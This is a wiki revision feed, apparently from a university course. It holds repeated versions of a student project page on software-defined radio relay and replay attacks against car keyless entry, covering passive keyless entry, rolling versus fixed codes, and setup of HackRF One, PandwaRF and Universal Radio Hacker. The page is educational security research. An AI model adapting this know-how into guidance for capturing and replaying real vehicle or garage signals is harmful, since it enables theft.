* Gonzalez, D. and Hayajneh, T., n.d. Detection And Prevention Of Crypto-Ransomware.&lt;br /&gt;
&lt;br /&gt;
* Malwarebytes.com. 2021. [https://www.malwarebytes.com/ransomware What is Ransomware?]&lt;br /&gt;
&lt;br /&gt;
* usa.kaspersky.com. 2021. [https://usa.kaspersky.com/resource-center/definitions/scareware What is Scareware?]&lt;br /&gt;
&lt;br /&gt;
* crowdstrike.com. 2021. [https://www.crowdstrike.com/cybersecurity-101/ransomware/ransomware-as-a-service-raas/ Ransomware as a Service (RaaS) Explained]&lt;br /&gt;
&lt;br /&gt;
* Kost, E., 2021. [https://www.upguard.com/blog/what-is-ransomware-as-a-service What is Ransomware as a Service (RaaS)?]&lt;br /&gt;
&lt;br /&gt;
Pictures:&lt;br /&gt;
&amp;lt;references&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;keyexchange&amp;quot;&amp;gt; O’Reilly Online Learning. 2022. [https://www.oreilly.com/library/view/preventing-ransomware/9781788620604/fcce9fbd-3757-4466-8036-ce7ea1a578e2.xhtml Preventing Ransomware]&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;attackchain&amp;quot;&amp;gt; Exabeam. 2022. [https://www.exabeam.com/information-security/ransomwares-weakness-how-to-turn-ransomwares-achilles-heel-into-the-defenders-golden-hour/ Ransomware&#039;s Weakness: How to Turn Ransomware’s Achilles’ Heel Into the Defender’s Golden Hour].&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;ghidra&amp;quot;&amp;gt; Ghidra-sre.org. 2022. [https://ghidra-sre.org Ghidra].&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
[[Category:Basic]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10383</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10383"/>
		<updated>2022-07-14T09:10:50Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with HackRF One */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is near a car which has the keyless entry technology, an “Acknowledgement” will be transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check between the car and the key will begin.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits to the car key code, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
===Rolling Codes vs. Fixed Codes===&lt;br /&gt;
&lt;br /&gt;
Remote controls send a digital code word to the receiver. If the receiver considers the code as correct, the sender will do the stuff which it is programmed for. For example: opening a door, closing, blocking, holding or locking etc. Simple remote controls use fixed code word. That means the code word which opens the a door today, would open the door some time in the future with the same code word. An attacker who has the right device to capture a code, could easily capture the simple code and send it sometime later to open the door. Some safer systems would use so called &amp;quot;Rolling codes&amp;quot;. With rolling codes, hacker would be able to capture a signal, but to retransmit these signal, he need to know the algorithm behind the rolling code in order to open the door because the captured code is used already and therefore deleted in the code algorithm. The rolling code system uses an encryption method which allows the sender and the receiver to use share codewords in to make it harder for the attacker to steal the code. &lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code. &lt;br /&gt;
&lt;br /&gt;
Side Note: You won´t be able to use PandwaRF to open your car. After long researches and communication with the manufacturer, the car opener function is only allowed for the goverment or law enforcement.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF One ===&lt;br /&gt;
*Warning: The HackRF One will not be able to transmit on windows &lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions. With dual boot you will be able to use Windows and Kali Linux native simultaneously.&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
* Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10382</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10382"/>
		<updated>2022-07-14T09:08:26Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is near a car which has the keyless entry technology, an “Acknowledgement” will be transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check between the car and the key will begin.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits to the car key code, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
===Rolling Codes vs. Fixed Codes===&lt;br /&gt;
&lt;br /&gt;
Remote controls send a digital code word to the receiver. If the receiver considers the code as correct, the sender will do the stuff which it is programmed for. For example: opening a door, closing, blocking, holding or locking etc. Simple remote controls use fixed code word. That means the code word which opens the a door today, would open the door some time in the future with the same code word. An attacker who has the right device to capture a code, could easily capture the simple code and send it sometime later to open the door. Some safer systems would use so called &amp;quot;Rolling codes&amp;quot;. With rolling codes, hacker would be able to capture a signal, but to retransmit these signal, he need to know the algorithm behind the rolling code in order to open the door because the captured code is used already and therefore deleted in the code algorithm. The rolling code system uses an encryption method which allows the sender and the receiver to use share codewords in to make it harder for the attacker to steal the code. &lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code. &lt;br /&gt;
&lt;br /&gt;
Side Note: You won´t be able to use PandwaRF to open your car. After long researches and communication with the manufacturer, the car opener function is only allowed for the goverment or law enforcement.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF One ===&lt;br /&gt;
*Warning: The HackRF One will not be able to transmit on windows &lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
* Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10381</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10381"/>
		<updated>2022-07-14T08:55:04Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with HackRF one */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
We want to simulate a keyless car hacking situation. Therefore we want to interfere with a connection between a car and a car key during the unlocking process.&lt;br /&gt;
The key question is: How does a Passive Keyless Entry (PKE) system works? PKE communication is an electronic locking system which is mainly used for entering cars without the need of a key. The locking system uses passive components (keys) which will be activated by the car. The car constantly transmits its recognition signal, range is about 1.5-3 meters.&lt;br /&gt;
One of the most used systems is the so-called “keyless entry system”. Therefore, the car environment is surrounded by periodically low frequency signals about 130 kHz. If the right key is in this zone, the chip is reacting with those low frequencies and is creating an ID with ASK / FSK modulated signals.&lt;br /&gt;
Therefore, we got 2 possibilities:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; 1.     The car is sending a LF signal with some kind of “wake up signal”. &#039;&#039;&#039;&lt;br /&gt;
#  	The car is sending permanent wake up signals.&lt;br /&gt;
# 	If a “keyless entry key” is in the near of, an “Acknowledgement” is transmitted to the car.&lt;br /&gt;
#  	If the key and car fits together, an ID check is going to start.&lt;br /&gt;
# 	The car is sending an ID to the key – if it fits, the key is transmitting the right key code. If the key code fits to the one of the automotive, the car is opening.&lt;br /&gt;
&#039;&#039;&#039;2.     The car sends a LF signal with a car ID. &#039;&#039;&#039;&lt;br /&gt;
#  	Periodically a LF signal is transmitted by the car.&lt;br /&gt;
# 	If a “keyless entry key” is nearby and the ID fits to the one of the car’s, the key transmits the right “key code”. If the key code fits, the car is going to open.&lt;br /&gt;
&lt;br /&gt;
== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Software &#039;&#039;&#039;&lt;br /&gt;
*Computer with native Kali-Linux installed.&lt;br /&gt;
*License for PandwaRF.&lt;br /&gt;
*PandwaRF App for Android. (Must be a device with latest Android version installed)&lt;br /&gt;
*Universal Radio Hacker&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
===Rolling Codes vs. Fixed Codes===&lt;br /&gt;
&lt;br /&gt;
Remote controls send a digital code word to the receiver. If the receiver considers the code as correct, the sender will do the stuff which it is programmed for. For example: opening a door, closing, blocking, holding or locking etc. Simple remote controls use fixed code word. That means the code word which opens the a door today, would open the door some time in the future with the same code word. An attacker who has the right device to capture a code, could easily capture the simple code and send it sometime later to open the door. Some safer systems would use so called &amp;quot;Rolling codes&amp;quot;. With rolling codes, hacker would be able to capture a signal, but to retransmit these signal, he need to know the algorithm behind the rolling code in order to open the door because the captured code is used already and therefore deleted in the code algorithm. The rolling code system uses an encryption method which allows the sender and the receiver to use share codewords in to make it harder for the attacker to steal the code. &lt;br /&gt;
&lt;br /&gt;
=== Pentesting with PandwaRF ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Install the application on your Android Phone.&lt;br /&gt;
#Open the Device.&lt;br /&gt;
#Install the antennas. (Never use a SDR Device without antennas.)&lt;br /&gt;
#Connect the PandwaRF via USB-C to your phone.&lt;br /&gt;
#Open the application.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#The device should have connected with your application. If not, do it manually in the search tab.&lt;br /&gt;
#After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency. &lt;br /&gt;
#At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze. &lt;br /&gt;
#In order to transmit a captured signal, you need to buy a &amp;quot;Kaiju License&amp;quot;. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code. &lt;br /&gt;
&lt;br /&gt;
Side Note: You won´t be able to use PandwaRF to open your car. After long researches and communication with the manufacturer, the car opener function is only allowed for the goverment or law enforcement.&lt;br /&gt;
&lt;br /&gt;
=== Pentesting with HackRF One ===&lt;br /&gt;
*Warning: The HackRF One will not be able to transmit on windows &lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
#Set up a laptop with native kali linux &lt;br /&gt;
#If you want dual boot on your local machine use these instructions&lt;br /&gt;
&lt;br /&gt;
* Dualboot on windows machine &lt;br /&gt;
&lt;br /&gt;
#You need a USB stick with a minimum of 8gb storage&lt;br /&gt;
#Download Kali image from official website https://www.kali.org/docs/development/live-build-a-custom-kali-iso/&lt;br /&gt;
#Download e.g. Etcher to flash the image on the USB stick to make it bootable https://www.balena.io/etcher/&lt;br /&gt;
#On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.&lt;br /&gt;
#For further information follow the instructions on the official website https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
* Driver Installation on HackRF One&lt;br /&gt;
#Download Zadig https://zadig.akeo.ie/&lt;br /&gt;
#Only compatible with Windows &lt;br /&gt;
&lt;br /&gt;
* Set-up HackRF on Linux&lt;br /&gt;
#	Sudo apt-get update&lt;br /&gt;
#	Sudo apt-get -y install hackrf&lt;br /&gt;
&lt;br /&gt;
Download Universal Radio Hacker on Linux machine&lt;br /&gt;
* First method &lt;br /&gt;
#	Sudo python3 -m pip install –upgrade pip&lt;br /&gt;
#	Sudo python3 -m pip install urh&lt;br /&gt;
* Second method &lt;br /&gt;
#	Sudo apt -y install urh&lt;br /&gt;
* Third method&lt;br /&gt;
#	git clone https://github.com/jopohl/urh&lt;br /&gt;
#   cd urh&lt;br /&gt;
#   python setup.py install&lt;br /&gt;
* Start Universal Radio Hacker with the command “urh”&lt;br /&gt;
#	Choose HackRF&lt;br /&gt;
#	Enter the frequency&lt;br /&gt;
&lt;br /&gt;
=== Nesdr Smart – receive only ===&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 1 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Install the driver with zadig (detailed information in the HackRF One section)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039; Step 2 &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
* HackRF One&lt;br /&gt;
* PandwaRF&lt;br /&gt;
* Nooelec SDR&lt;br /&gt;
&lt;br /&gt;
== Conclusion ==&lt;br /&gt;
We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well (Only for Garage Openers), but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.youtube.com/watch?v=5CsD8I396wo&amp;amp;t=327s&lt;br /&gt;
* https://www.essentracomponents.com/en-gb/news/product-resources/explaining-remote-keyless-entry-in-cars&lt;br /&gt;
* https://en.wikipedia.org/wiki/Rolling_code#:~:text=A%20rolling%20code%20(or%20sometimes,and%20keyless%20car%20entry%20systems&lt;br /&gt;
* https://www.youtube.com/watch?v=XrRGDQ2IzDE&lt;br /&gt;
* https://en.wikipedia.org/wiki/Remote_keyless_system&lt;br /&gt;
* https://sectigo.com/resource-library/why-automotive-key-fob-encryption-hacks-are-making-headlines&lt;br /&gt;
* https://rolling.pandwarf.com/&lt;br /&gt;
* https://www.offensive-wireless.com/how-to-install-universal-radio-hacker/&lt;br /&gt;
* https://installati.one/ubuntu/20.04/hackrf/&lt;br /&gt;
* https://zadig.akeo.ie/&lt;br /&gt;
* https://www.kali.org/docs/usb/live-usb-install-with-linux/&lt;br /&gt;
* https://www.balena.io/etcher/&lt;br /&gt;
* https://www.kali.org/docs/introduction/download-official-kali-linux-images/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10380</id>
		<title>Software-defined radio (SDR): Relay Attacks</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Software-defined_radio_(SDR):_Relay_Attacks&amp;diff=10380"/>
		<updated>2022-07-14T08:51:35Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting with HackRF one */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
